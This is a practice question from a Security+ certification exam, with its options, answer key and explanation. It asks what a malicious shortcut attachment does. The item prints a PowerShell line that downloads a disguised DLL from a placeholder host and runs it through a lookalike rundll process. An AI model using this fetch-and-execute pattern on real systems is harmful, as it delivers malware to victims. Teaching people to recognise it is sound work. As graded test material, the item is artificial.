CompTIA Security+ (SY0-601) — Question 276

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

Answer options

• A. A PowerShell code is performing a DLL injection.
• B. A PowerShell code is displaying a picture.
• C. A PowerShell code is configuring environmental variables.
• D. A PowerShell code is changing Windows Update settings.

Correct answer: A

Explanation

The correct answer is A because the script downloads a DLL file and executes it, which indicates a DLL injection attack. Options B, C, and D are incorrect as the script does not display an image, configure variables, or modify Windows Update settings.